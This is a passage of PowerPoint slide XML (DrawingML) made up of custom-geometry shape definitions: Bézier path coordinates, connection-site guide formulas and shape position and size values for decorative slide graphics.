                  <a:moveTo>
                    <a:pt x="11845474" y="4808480"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11849048" y="4357969"/>
                    <a:pt x="11706046" y="3904846"/>
                    <a:pt x="11412966" y="3555624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11305286" y="3427260"/>
                    <a:pt x="11179258" y="3334766"/>
                    <a:pt x="11052612" y="3227842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10945276" y="3137203"/>
                    <a:pt x="10945482" y="2986712"/>
                    <a:pt x="10983482" y="2860891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11047802" y="2648073"/>
                    <a:pt x="11166614" y="2457657"/>
                    <a:pt x="11253267" y="2254322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11312914" y="2114344"/>
                    <a:pt x="11374897" y="1963647"/>
                    <a:pt x="11399978" y="1813018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11451380" y="1517533"/>
                    <a:pt x="11401216" y="1209611"/>
                    <a:pt x="11199805" y="976590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10946375" y="683372"/>
                    <a:pt x="10608079" y="515633"/>
                    <a:pt x="10262087" y="359370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9794190" y="148064"/>
                    <a:pt x="9254689" y="10629"/>
                    <a:pt x="8739652" y="2314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8739171" y="2314"/>
                    <a:pt x="8738690" y="2314"/>
                    <a:pt x="8738209" y="2314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8457636" y="-2015"/>
                    <a:pt x="8177337" y="-3390"/>
                    <a:pt x="7897039" y="27258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7661819" y="52959"/>
                    <a:pt x="7303321" y="54814"/>
                    <a:pt x="6377834" y="382390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6028337" y="506150"/>
                    <a:pt x="5686743" y="652518"/>
                    <a:pt x="5338208" y="777515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4407155" y="1111413"/>
                    <a:pt x="3390275" y="1044414"/>
                    <a:pt x="2418679" y="994388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2238914" y="985111"/>
                    <a:pt x="2059149" y="974460"/>
                    <a:pt x="1879522" y="962846"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1698795" y="951164"/>
                    <a:pt x="1518274" y="929656"/>
                    <a:pt x="1336998" y="929793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="868276" y="930205"/>
                    <a:pt x="455903" y="1217101"/>
                    <a:pt x="229753" y="1615937"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-144825" y="2276517"/>
                    <a:pt x="7384" y="3230384"/>
                    <a:pt x="202541" y="3924705"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271121" y="4168583"/>
                    <a:pt x="370762" y="4405865"/>
                    <a:pt x="495690" y="4626242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="739224" y="5056207"/>
                    <a:pt x="1054088" y="5440199"/>
                    <a:pt x="1447770" y="5741113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2086017" y="6229076"/>
                    <a:pt x="2843971" y="6404099"/>
                    <a:pt x="3634978" y="6356066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3637245" y="6355928"/>
                    <a:pt x="3639513" y="6355653"/>
                    <a:pt x="3641780" y="6355310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4538680" y="6224747"/>
                    <a:pt x="5467809" y="6298549"/>
                    <a:pt x="6362098" y="6419286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6829170" y="6482368"/>
                    <a:pt x="7291433" y="6590529"/>
                    <a:pt x="7762147" y="6644267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8589092" y="6738615"/>
                    <a:pt x="9419336" y="6760674"/>
                    <a:pt x="10242571" y="6623445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10490916" y="6581253"/>
                    <a:pt x="10744277" y="6525179"/>
                    <a:pt x="10965685" y="6400182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11544011" y="6073705"/>
                    <a:pt x="11840458" y="5443704"/>
                    <a:pt x="11845474" y="4808480"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8836131" y="6627774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8829878" y="6625850"/>
                    <a:pt x="8823762" y="6623720"/>
                    <a:pt x="8817647" y="6621452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8900039" y="6630798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8883821" y="6636501"/>
                    <a:pt x="8862382" y="6635814"/>
                    <a:pt x="8836131" y="66277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95E2B1B-776A-4FF5-A9C6-C84CB9ECA756}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1802672" y="30693"/>
              <a:ext cx="3530701" cy="5882364"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3448241 w 3530701"/>
                <a:gd name="connsiteY0" fmla="*/ 5499411 h 5882364"/>
                <a:gd name="connsiteX1" fmla="*/ 446663 w 3530701"/>
                <a:gd name="connsiteY1" fmla="*/ 5877357 h 5882364"/>
                <a:gd name="connsiteX2" fmla="*/ 226768 w 3530701"/>
                <a:gd name="connsiteY2" fmla="*/ 5746794 h 5882364"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 3530701"/>
                <a:gd name="connsiteY3" fmla="*/ 287331 h 5882364"/>
                <a:gd name="connsiteX4" fmla="*/ 219896 w 3530701"/>
                <a:gd name="connsiteY4" fmla="*/ 101794 h 5882364"/>
                <a:gd name="connsiteX5" fmla="*/ 3164782 w 3530701"/>
                <a:gd name="connsiteY5" fmla="*/ 24 h 5882364"/>
                <a:gd name="connsiteX6" fmla="*/ 3331422 w 3530701"/>
                <a:gd name="connsiteY6" fmla="*/ 129350 h 5882364"/>
                <a:gd name="connsiteX7" fmla="*/ 3530702 w 3530701"/>
                <a:gd name="connsiteY7" fmla="*/ 5417019 h 5882364"/>
                <a:gd name="connsiteX8" fmla="*/ 3448241 w 3530701"/>
                <a:gd name="connsiteY8" fmla="*/ 5499411 h 588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0701" h="5882364">
                  <a:moveTo>
                    <a:pt x="3448241" y="5499411"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="446663" y="5877357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="291706" y="5904020"/>
                    <a:pt x="224706" y="5818948"/>
                    <a:pt x="226768" y="5746794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="287331"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6734" y="225485"/>
                    <a:pt x="0" y="108666"/>
                    <a:pt x="219896" y="101794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3164782" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3270606" y="-1282"/>
                    <a:pt x="3328192" y="51836"/>
                    <a:pt x="3331422" y="129350"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3530702" y="5417019"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3530702" y="5462304"/>
                    <a:pt x="3493595" y="5499411"/>
                    <a:pt x="3448241" y="549941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03BD8EB-C080-4F97-93D0-C3838BDE49B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5127296" y="4543591"/>
              <a:ext cx="3355603" cy="1803622"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2838162 w 3355603"/>
                <a:gd name="connsiteY0" fmla="*/ 1584217 h 1803622"/>
                <a:gd name="connsiteX1" fmla="*/ 2884271 w 3355603"/>
                <a:gd name="connsiteY1" fmla="*/ 1555424 h 1803622"/>
                <a:gd name="connsiteX2" fmla="*/ 3267577 w 3355603"/>
                <a:gd name="connsiteY2" fmla="*/ 1540101 h 1803622"/>
                <a:gd name="connsiteX3" fmla="*/ 3291009 w 3355603"/>
                <a:gd name="connsiteY3" fmla="*/ 1536115 h 1803622"/>
                <a:gd name="connsiteX4" fmla="*/ 3286337 w 3355603"/>
                <a:gd name="connsiteY4" fmla="*/ 1528075 h 1803622"/>
                <a:gd name="connsiteX5" fmla="*/ 3332652 w 3355603"/>
                <a:gd name="connsiteY5" fmla="*/ 1525051 h 1803622"/>
                <a:gd name="connsiteX6" fmla="*/ 3352030 w 3355603"/>
                <a:gd name="connsiteY6" fmla="*/ 1450974 h 1803622"/>
                <a:gd name="connsiteX7" fmla="*/ 3355604 w 3355603"/>
                <a:gd name="connsiteY7" fmla="*/ 1419433 h 1803622"/>
                <a:gd name="connsiteX8" fmla="*/ 3342478 w 3355603"/>
                <a:gd name="connsiteY8" fmla="*/ 1254786 h 1803622"/>
                <a:gd name="connsiteX9" fmla="*/ 3282419 w 3355603"/>
                <a:gd name="connsiteY9" fmla="*/ 1046366 h 1803622"/>
                <a:gd name="connsiteX10" fmla="*/ 3269364 w 3355603"/>
                <a:gd name="connsiteY10" fmla="*/ 1018947 h 1803622"/>
                <a:gd name="connsiteX11" fmla="*/ 3218444 w 3355603"/>
                <a:gd name="connsiteY11" fmla="*/ 982252 h 1803622"/>
                <a:gd name="connsiteX12" fmla="*/ 3088430 w 3355603"/>
                <a:gd name="connsiteY12" fmla="*/ 976480 h 1803622"/>
                <a:gd name="connsiteX13" fmla="*/ 2850737 w 3355603"/>
                <a:gd name="connsiteY13" fmla="*/ 963699 h 1803622"/>
                <a:gd name="connsiteX14" fmla="*/ 3004183 w 3355603"/>
                <a:gd name="connsiteY14" fmla="*/ 916009 h 1803622"/>
                <a:gd name="connsiteX15" fmla="*/ 3296301 w 3355603"/>
                <a:gd name="connsiteY15" fmla="*/ 702710 h 1803622"/>
                <a:gd name="connsiteX16" fmla="*/ 3105954 w 3355603"/>
                <a:gd name="connsiteY16" fmla="*/ 720027 h 1803622"/>
                <a:gd name="connsiteX17" fmla="*/ 2727183 w 3355603"/>
                <a:gd name="connsiteY17" fmla="*/ 590769 h 1803622"/>
                <a:gd name="connsiteX18" fmla="*/ 2312474 w 3355603"/>
                <a:gd name="connsiteY18" fmla="*/ 317343 h 1803622"/>
                <a:gd name="connsiteX19" fmla="*/ 1839491 w 3355603"/>
                <a:gd name="connsiteY19" fmla="*/ 80748 h 1803622"/>
                <a:gd name="connsiteX20" fmla="*/ 1146063 w 3355603"/>
                <a:gd name="connsiteY20" fmla="*/ 12924 h 1803622"/>
                <a:gd name="connsiteX21" fmla="*/ 340077 w 3355603"/>
                <a:gd name="connsiteY21" fmla="*/ 315212 h 1803622"/>
                <a:gd name="connsiteX22" fmla="*/ 51601 w 3355603"/>
                <a:gd name="connsiteY22" fmla="*/ 627327 h 1803622"/>
                <a:gd name="connsiteX23" fmla="*/ 878272 w 3355603"/>
                <a:gd name="connsiteY23" fmla="*/ 1437849 h 1803622"/>
                <a:gd name="connsiteX24" fmla="*/ 1878729 w 3355603"/>
                <a:gd name="connsiteY24" fmla="*/ 1678910 h 1803622"/>
                <a:gd name="connsiteX25" fmla="*/ 2660390 w 3355603"/>
                <a:gd name="connsiteY25" fmla="*/ 1799440 h 1803622"/>
                <a:gd name="connsiteX26" fmla="*/ 2805177 w 3355603"/>
                <a:gd name="connsiteY26" fmla="*/ 1733059 h 1803622"/>
                <a:gd name="connsiteX27" fmla="*/ 2838093 w 3355603"/>
                <a:gd name="connsiteY27" fmla="*/ 1585385 h 1803622"/>
                <a:gd name="connsiteX28" fmla="*/ 2838162 w 3355603"/>
                <a:gd name="connsiteY28" fmla="*/ 1584217 h 1803622"/>
                <a:gd name="connsiteX29" fmla="*/ 2838024 w 3355603"/>
                <a:gd name="connsiteY29" fmla="*/ 1585042 h 1803622"/>
                <a:gd name="connsiteX30" fmla="*/ 1668522 w 3355603"/>
                <a:gd name="connsiteY30" fmla="*/ 1503131 h 1803622"/>
                <a:gd name="connsiteX31" fmla="*/ 1675394 w 3355603"/>
                <a:gd name="connsiteY31" fmla="*/ 1503886 h 1803622"/>
                <a:gd name="connsiteX32" fmla="*/ 1668522 w 3355603"/>
                <a:gd name="connsiteY32" fmla="*/ 1503131 h 180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55603" h="1803622">
                  <a:moveTo>
                    <a:pt x="2838162" y="1584217"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2841116" y="1558792"/>
                    <a:pt x="2858640" y="1555219"/>
                    <a:pt x="2884271" y="1555424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3012223" y="1556318"/>
                    <a:pt x="3140106" y="1551989"/>
                    <a:pt x="3267577" y="1540101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3275411" y="1539345"/>
                    <a:pt x="3283176" y="1537421"/>
                    <a:pt x="3291009" y="1536115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3291147" y="1532129"/>
                    <a:pt x="3275411" y="1532129"/>
                    <a:pt x="3286337" y="1528075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3300699" y="1522784"/>
                    <a:pt x="3321451" y="1544155"/>
                    <a:pt x="3332652" y="1525051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3345502" y="1503131"/>
                    <a:pt x="3352168" y="1477774"/>
                    <a:pt x="3352030" y="1450974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3351961" y="1440941"/>
                    <a:pt x="3342135" y="1428297"/>
                    <a:pt x="3355604" y="1419433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3345434" y="1365146"/>
                    <a:pt x="3355535" y="1309691"/>
                    <a:pt x="3342478" y="1254786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3325643" y="1184213"/>
                    <a:pt x="3302898" y="1115702"/>
                    <a:pt x="3282419" y="1046366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3277953" y="1037295"/>
                    <a:pt x="3271838" y="1028568"/>
                    <a:pt x="3269364" y="1018947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3262354" y="992148"/>
                    <a:pt x="3247649" y="981497"/>
                    <a:pt x="3218444" y="982252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3175220" y="983352"/>
                    <a:pt x="3131791" y="978748"/>
                    <a:pt x="3088430" y="976480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3009199" y="972288"/>
                    <a:pt x="2929968" y="967959"/>
                    <a:pt x="2850737" y="963699"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2902619" y="948375"/>
                    <a:pt x="2954294" y="935044"/>
                    <a:pt x="3004183" y="916009"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3120933" y="871549"/>
                    <a:pt x="3229920" y="816231"/>
                    <a:pt x="3296301" y="702710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3233081" y="710406"/>
                    <a:pt x="3170617" y="724012"/>
                    <a:pt x="3105954" y="720027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2967625" y="711437"/>
                    <a:pt x="2844690" y="659143"/>
                    <a:pt x="2727183" y="590769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2583907" y="507346"/>
                    <a:pt x="2451695" y="407019"/>
                    <a:pt x="2312474" y="317343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2163425" y="221276"/>
                    <a:pt x="2009361" y="135173"/>
                    <a:pt x="1839491" y="80748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1613685" y="3716"/>
                    <a:pt x="1382314" y="-16556"/>
                    <a:pt x="1146063" y="12924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="991999" y="33059"/>
                    <a:pt x="435319" y="229728"/>
                    <a:pt x="340077" y="315212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233221" y="411073"/>
                    <a:pt x="108224" y="517241"/>
                    <a:pt x="51601" y="627327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-200867" y="1118313"/>
                    <a:pt x="537295" y="1331749"/>
                    <a:pt x="878272" y="1437849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1205504" y="1539620"/>
                    <a:pt x="1545311" y="1615965"/>
                    <a:pt x="1878729" y="1678910"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137931" y="1727905"/>
                    <a:pt x="2398302" y="1769411"/>
                    <a:pt x="2660390" y="1799440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2739277" y="1808511"/>
                    <a:pt x="2772056" y="1809267"/>
                    <a:pt x="2805177" y="1733059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2816653" y="1706672"/>
                    <a:pt x="2848126" y="1629433"/>
                    <a:pt x="2838093" y="1585385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2838162" y="1584973"/>
                    <a:pt x="2838162" y="1584629"/>
                    <a:pt x="2838162" y="1584217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2838162" y="1584492"/>
                    <a:pt x="2838093" y="1584767"/>
                    <a:pt x="2838024" y="1585042"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1668522" y="1503131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1670790" y="1503405"/>
                    <a:pt x="1673126" y="1503680"/>
                    <a:pt x="1675394" y="1503886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1673126" y="1503612"/>
                    <a:pt x="1670790" y="1503405"/>
                    <a:pt x="1668522" y="150313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2BD9BD2-4D63-47DF-9F92-9ADB755B35DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1993236" y="381283"/>
              <a:ext cx="3261866" cy="5044631"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3261731 w 3261866"/>
                <a:gd name="connsiteY0" fmla="*/ 4644435 h 5044631"/>
                <a:gd name="connsiteX1" fmla="*/ 3233763 w 3261866"/>
                <a:gd name="connsiteY1" fmla="*/ 4678794 h 5044631"/>
                <a:gd name="connsiteX2" fmla="*/ 246616 w 3261866"/>
                <a:gd name="connsiteY2" fmla="*/ 5041416 h 5044631"/>
                <a:gd name="connsiteX3" fmla="*/ 200506 w 3261866"/>
                <a:gd name="connsiteY3" fmla="*/ 5004584 h 5044631"/>
                <a:gd name="connsiteX4" fmla="*/ 126 w 3261866"/>
                <a:gd name="connsiteY4" fmla="*/ 161172 h 5044631"/>
                <a:gd name="connsiteX5" fmla="*/ 32836 w 3261866"/>
                <a:gd name="connsiteY5" fmla="*/ 126195 h 5044631"/>
                <a:gd name="connsiteX6" fmla="*/ 3060870 w 3261866"/>
                <a:gd name="connsiteY6" fmla="*/ 99 h 5044631"/>
                <a:gd name="connsiteX7" fmla="*/ 3086845 w 3261866"/>
                <a:gd name="connsiteY7" fmla="*/ 23325 h 5044631"/>
                <a:gd name="connsiteX8" fmla="*/ 3261731 w 3261866"/>
                <a:gd name="connsiteY8" fmla="*/ 4644435 h 504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1866" h="5044631">
                  <a:moveTo>
                    <a:pt x="3261731" y="4644435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3262968" y="4668486"/>
                    <a:pt x="3255959" y="4675702"/>
                    <a:pt x="3233763" y="4678794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2951884" y="4717826"/>
                    <a:pt x="400405" y="5019152"/>
                    <a:pt x="246616" y="5041416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201881" y="5047876"/>
                    <a:pt x="202293" y="5048563"/>
                    <a:pt x="200506" y="5004584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178448" y="4479032"/>
                    <a:pt x="15450" y="514243"/>
                    <a:pt x="126" y="161172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-1111" y="133411"/>
                    <a:pt x="6517" y="127226"/>
                    <a:pt x="32836" y="126195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367833" y="113139"/>
                    <a:pt x="2803729" y="11437"/>
                    <a:pt x="3060870" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3080248" y="-726"/>
                    <a:pt x="3086089" y="3328"/>
                    <a:pt x="3086845" y="23325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3097702" y="304448"/>
                    <a:pt x="3254722" y="4509681"/>
                    <a:pt x="3261731" y="4644435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70E65F4-1DD1-415C-994C-53EC6206DA7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3298540" y="1717062"/>
              <a:ext cx="2274214" cy="1949573"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 12960 w 2274214"/>
                <a:gd name="connsiteY0" fmla="*/ 503679 h 1949573"/>
                <a:gd name="connsiteX1" fmla="*/ 236429 w 2274214"/>
                <a:gd name="connsiteY1" fmla="*/ 196787 h 1949573"/>
                <a:gd name="connsiteX2" fmla="*/ 1820572 w 2274214"/>
                <a:gd name="connsiteY2" fmla="*/ 6646 h 1949573"/>
                <a:gd name="connsiteX3" fmla="*/ 2034765 w 2274214"/>
                <a:gd name="connsiteY3" fmla="*/ 176927 h 1949573"/>
                <a:gd name="connsiteX4" fmla="*/ 2267304 w 2274214"/>
                <a:gd name="connsiteY4" fmla="*/ 1389790 h 1949573"/>
                <a:gd name="connsiteX5" fmla="*/ 2081080 w 2274214"/>
                <a:gd name="connsiteY5" fmla="*/ 1626522 h 1949573"/>
                <a:gd name="connsiteX6" fmla="*/ 642687 w 2274214"/>
                <a:gd name="connsiteY6" fmla="*/ 1933689 h 1949573"/>
                <a:gd name="connsiteX7" fmla="*/ 269413 w 2274214"/>
                <a:gd name="connsiteY7" fmla="*/ 1737707 h 1949573"/>
                <a:gd name="connsiteX8" fmla="*/ 12960 w 2274214"/>
                <a:gd name="connsiteY8" fmla="*/ 503679 h 194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4214" h="1949573">
                  <a:moveTo>
                    <a:pt x="12960" y="503679"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-52321" y="215684"/>
                    <a:pt x="145654" y="211767"/>
                    <a:pt x="236429" y="196787"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1820572" y="6646"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1937048" y="-21460"/>
                    <a:pt x="2009202" y="40386"/>
                    <a:pt x="2034765" y="176927"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2267304" y="1389790"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2272458" y="1415078"/>
                    <a:pt x="2318430" y="1571136"/>
                    <a:pt x="2081080" y="1626522"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1801812" y="1691666"/>
                    <a:pt x="1166039" y="1833980"/>
                    <a:pt x="642687" y="1933689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354829" y="1988594"/>
                    <a:pt x="298138" y="1895825"/>
                    <a:pt x="269413" y="1737707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189908" y="1370137"/>
                    <a:pt x="12960" y="503679"/>
                    <a:pt x="12960" y="503679"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent2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731B0A-98B3-45C0-8BAA-F23532EE34D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973937" y="111"/>
              <a:ext cx="2170622" cy="2457658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 172202 w 2170622"/>
                <a:gd name="connsiteY0" fmla="*/ 717711 h 2457658"/>
                <a:gd name="connsiteX1" fmla="*/ 155298 w 2170622"/>
                <a:gd name="connsiteY1" fmla="*/ 715650 h 2457658"/>
                <a:gd name="connsiteX2" fmla="*/ 35798 w 2170622"/>
                <a:gd name="connsiteY2" fmla="*/ 623706 h 2457658"/>
                <a:gd name="connsiteX3" fmla="*/ 5563 w 2170622"/>
                <a:gd name="connsiteY3" fmla="*/ 508535 h 2457658"/>
                <a:gd name="connsiteX4" fmla="*/ 17382 w 2170622"/>
                <a:gd name="connsiteY4" fmla="*/ 308774 h 2457658"/>
                <a:gd name="connsiteX5" fmla="*/ 307301 w 2170622"/>
                <a:gd name="connsiteY5" fmla="*/ 36172 h 2457658"/>
                <a:gd name="connsiteX6" fmla="*/ 987878 w 2170622"/>
                <a:gd name="connsiteY6" fmla="*/ 134575 h 2457658"/>
                <a:gd name="connsiteX7" fmla="*/ 1072126 w 2170622"/>
                <a:gd name="connsiteY7" fmla="*/ 186182 h 2457658"/>
                <a:gd name="connsiteX8" fmla="*/ 1201865 w 2170622"/>
                <a:gd name="connsiteY8" fmla="*/ 497953 h 2457658"/>
                <a:gd name="connsiteX9" fmla="*/ 1383966 w 2170622"/>
                <a:gd name="connsiteY9" fmla="*/ 1177431 h 2457658"/>
                <a:gd name="connsiteX10" fmla="*/ 1936179 w 2170622"/>
                <a:gd name="connsiteY10" fmla="*/ 1381247 h 2457658"/>
                <a:gd name="connsiteX11" fmla="*/ 2169474 w 2170622"/>
                <a:gd name="connsiteY11" fmla="*/ 1814510 h 2457658"/>
                <a:gd name="connsiteX12" fmla="*/ 1923672 w 2170622"/>
                <a:gd name="connsiteY12" fmla="*/ 2445955 h 2457658"/>
                <a:gd name="connsiteX13" fmla="*/ 1889588 w 2170622"/>
                <a:gd name="connsiteY13" fmla="*/ 2455026 h 2457658"/>
                <a:gd name="connsiteX14" fmla="*/ 1881136 w 2170622"/>
                <a:gd name="connsiteY14" fmla="*/ 2423965 h 2457658"/>
                <a:gd name="connsiteX15" fmla="*/ 1725629 w 2170622"/>
                <a:gd name="connsiteY15" fmla="*/ 2017708 h 2457658"/>
                <a:gd name="connsiteX16" fmla="*/ 1713534 w 2170622"/>
                <a:gd name="connsiteY16" fmla="*/ 2005888 h 2457658"/>
                <a:gd name="connsiteX17" fmla="*/ 1348439 w 2170622"/>
                <a:gd name="connsiteY17" fmla="*/ 1764828 h 2457658"/>
                <a:gd name="connsiteX18" fmla="*/ 868241 w 2170622"/>
                <a:gd name="connsiteY18" fmla="*/ 1167055 h 2457658"/>
                <a:gd name="connsiteX19" fmla="*/ 882809 w 2170622"/>
                <a:gd name="connsiteY19" fmla="*/ 883939 h 2457658"/>
                <a:gd name="connsiteX20" fmla="*/ 843572 w 2170622"/>
                <a:gd name="connsiteY20" fmla="*/ 672839 h 2457658"/>
                <a:gd name="connsiteX21" fmla="*/ 764616 w 2170622"/>
                <a:gd name="connsiteY21" fmla="*/ 640885 h 2457658"/>
                <a:gd name="connsiteX22" fmla="*/ 172202 w 2170622"/>
                <a:gd name="connsiteY22" fmla="*/ 717711 h 245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70622" h="2457658">
                  <a:moveTo>
                    <a:pt x="172202" y="717711"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166567" y="717024"/>
                    <a:pt x="160933" y="715993"/>
                    <a:pt x="155298" y="715650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94689" y="712008"/>
                    <a:pt x="52771" y="685964"/>
                    <a:pt x="35798" y="623706"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25353" y="585361"/>
                    <a:pt x="12640" y="547704"/>
                    <a:pt x="5563" y="508535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3852" y="441124"/>
                    <a:pt x="-2203" y="374261"/>
